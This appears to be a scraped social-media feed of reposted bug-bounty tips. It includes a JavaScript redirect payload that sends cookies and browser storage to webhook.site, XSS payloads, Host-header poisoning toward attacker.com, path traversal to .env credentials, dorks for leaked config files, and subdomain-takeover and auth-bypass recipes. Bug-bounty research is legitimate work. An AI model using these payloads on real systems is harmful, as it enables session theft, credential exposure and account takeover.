Curiosity is The Engine of Achievement

Joined April 2022
Pinned Tweet
2 May 2024
“If you want to find the secrets of the universe, think in terms of energy, frequency and vibration.” ~ Nikola Tesla
/login?redirectUrl=javascript:fetch('webhook.site 0{method:'POST', body:JSON.stringify({cookies:document.cookie,sessionStorage:sessionStorage,localStorage:localStorage})}) credit: @JoaoGomes12243 #bugbountytips #BugBounty
I earned $$$$$ for my submission on bugcrowd.com/h/ahmadalzuriqi Found a flaw in /api/users/$id/rest-password/ (admin panel): OTP exposed inside JWT → reset password → new password. → Admin account takeover credit: @ZuriqiAhmad #BugBounty #bugbountytips
Sensitive Information Disclosure (Path Traversal) 🔥 URL: http://IP_removed/index.php/../../.env IMPACT: Database credentials, Laravel app_key. credit: @datafuel0 #BugBounty #bugbountytip
⚡ 'Datr' cookie theft and AI leads to Facebook account takeover via trusted device recovery ($24,000 bounty) Blog: ysamm.com/uncategorized/2025… Author: @samm0uda credit: @mqst_ #bugbountytips #BugBounty #infosec
Tip: Add to your wordlist /backup.tar credit: @111xNagashy #bugbountytips #BugBounty
$500 bounty for DNS email takeover via improper domain verification. A non-authorized DNS mail under the main domain was accepted as a company email, allowing account creation and data access. credit: @jatav_ravi #bugbountytips #BugBounty
Account Takeover via Password Reset Poisoning Tips:
1. During signup or password reset flow, replace the Host header value with: Host: attacker.com
2. Observe that the email verification or password reset link got poisoned
credit: @wadgamaraldeen #bugbountytips
Subdomain Takeover via Unclaimed CNAME 1️⃣ dev(.)example(.)com → CNAME to unclaimed(.)project(.)hosting(.)com 2️⃣ project(.)hosting(.)com is not in use 3️⃣ Attacker creates a project at that provider with the same name 4️⃣ Takes over dev(.)example(.)com credit: @NullSecurityX #bounty
High severity vulnerability 🔥 Low-priv user got 401 on versioned endpoint. Removing v2 bypassed auth and exposed sensitive identity images. Normal: /omni/get/images/v2 (401) Bypass: /omni/get/images (succeeds) credit: @mrdesoky0 #bugbountytips #BugBounty
Reflected XSS on Hyundai subdomain. 🎯 Payload: "><svg/onload=confirm(1)> #xss #bugbountytips #BugBounty
🔥 Low => Critical? Tip: When you find phpinfo, search for [db_password, db_username] credit: @111xNagashy #bugbountytips #BugBounty
Google Dorks are still undefeated in 2026. 🔍 Found a "sussy" config leak today: full SMTP access was just sitting there in plain text. Impact verified, report sent, and awareness raised. credit: @0x0smilex #bugbountytips #ethicalhacking
Found an exposed .env file using a simple dork: site:example.com filetype:env #bugbountytips #BugBounty
Found a fantastic free web app for new Bug Bounty Hunters who can’t invest much into tools yet. trinetlayer.com You can instantly jump into scanning and spend more time exploring, digging deeper, and sharpening your techniques. credit: @Raman_Mohurle #bugbountytips
Here is how chaining a self‑XSS with an HTML email injection resulted in account takeover blog.ayoubnouri.me/blog/when…… credit: @ay0ub_n0uri #bugbountytips #xss
PDF file for XSS: it can bypass any WAF, for those looking for Stored XSS, and it can be changed to blind if you want. Simply, I encoded the payload as ASCII hex. You can edit the payload in Notepad. github.com/orwagodfather/… credits: @GodfatherOrwa #bugbountytips
A very good XSS payload. 🔥 <sCriPt x>(((confirm)))``</scRipt x> credit: @viehgroup #bugbountytips #xss #bugbounty
11 Oct 2025
🔥I found a High severity #IDOR vulnerability on @Bugcrowd platform that led to ATO! Once again, developers messed up by returning the session access token of the victim, allowing me to gain full access to the user's account. credit: @PlatasSec #bugbounty #tips